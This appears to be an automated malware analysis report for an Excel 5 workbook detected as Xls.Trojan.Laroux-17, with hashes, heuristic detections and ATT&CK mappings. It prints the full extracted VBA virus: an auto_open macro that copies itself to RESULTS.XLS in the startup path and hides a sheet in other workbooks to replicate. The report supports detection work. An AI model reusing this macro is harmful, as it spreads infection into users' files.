Xls.Trojan.Laroux-17 Office (OLE) malware analysis — malicious · 4877fcf323dc2596

MALICIOUS

Office (OLE)

48.0 KB Created: 1980-01-04 00:30:07 Authoring application: Microsoft Excel First seen: 2012-06-14

MD5: e2d66811994a02315beed788fe7d831d SHA-1: e28b881281c3b8170e6dc990cf4569a73ac9b324 SHA-256: 4877fcf323dc2596e32ed5d39e7a7eb03711535565c925676ffc65acc6f34905

240 Risk Score

Malware Insights

Xls.Trojan.Laroux-17 · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file contains critical heuristic firings indicating it is an Excel 5 macro virus, specifically identified as Xls.Trojan.Laroux-17. The auto_open macro is designed to execute when the workbook is opened, and the script attempts to copy and save a file named 'RESULTS.XLS' to the startup path, which is a common persistence technique. This suggests the file is a malicious attachment designed to deliver a secondary payload.

Heuristics 4

ClamAV: Xls.Trojan.Laroux-17 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Xls.Trojan.Laroux-17
Excel 5 Laroux/Larou-CV macro-virus marker cluster critical OLE_XLS5_LAROUX_MACRO_VIRUS

Legacy Excel workbook contains a Laroux/Larou-CV macro-virus marker cluster including auto_open execution and workbook/module replication strings. This is a narrow indicator for an infected legacy Excel macro workbook.
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Auto_Open macro high OLE_VBA_AUTO

Auto_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	2067 bytes
SHA-256: `b3f853eab4ecc0183d42bb8c26a0dc0858edda555c2e679747ae792cdbf58823`
Detection ClamAV: Xls.Trojan.Laroux-17 Obfuscation or payload: unlikely
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "results" Option Compare Text Sub auto_open() Attribute auto_open.VB_ProcData.VB_Invoke_Func = " \n14" Rem ??!!???1 Application.OnSheetActivate = "body" End Sub Sub body() Attribute body.VB_ProcData.VB_Invoke_Func = " \n14" Dim awb As Workbook Set awb = ActiveWorkbook nameofworkbook$ = awb.Name currentdirectory$ = CurDir() pathofworkbook$ = awb.Path startpath$ = Application.StartupPath If Dir(startpath$ & "\" & "RESULTS.XLS") = "RESULTS.XLS" And awb.Modules.Count < 1 Then Application.ScreenUpdating = False sheetname$ = Workbooks(nameofworkbook$).Sheets(1).Name If sheetname$ <> "results" Then Workbooks("RESULTS.XLS").Sheets("results").Copy before:=Workbooks(nameofworkbook$).Sheets(1) Workbooks(nameofworkbook$).Sheets("results").Visible = False End If Application.OnSheetActivate = "" Application.ScreenUpdating = True Application.OnSheetActivate = "RESULTS.XLS!body" ElseIf Dir(startpath$ & "\" & "RESULTS.XLS") <> "RESULTS.XLS" And awb.Modules.Count > 0 Then Application.ScreenUpdating = False Sheets("results").Visible = True Sheets("results").Select Sheets("results").Copy Set awb = ActiveWorkbook awb.Title = "" awb.Subject = "" awb.Author = "" awb.Keywords = "" awb.Comments = "" newname$ = awb.Name ChDir Application.StartupPath ActiveWindow.Visible = False Workbooks(newname$).SaveAs Filename:=Application.StartupPath & "/" & "RESULTS.XLS", FileFormat:=xlNormal _ , Password:="", WriteResPassword:="", ReadOnlyRecommended:= _ False, CreateBackup:=False ChDir currentdirectory$ Workbooks(nameofworkbook$).Sheets("results").Visible = False Application.OnSheetActivate = "" Application.ScreenUpdating = True Application.OnSheetActivate = "RESULTS.XLS!body" End If End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.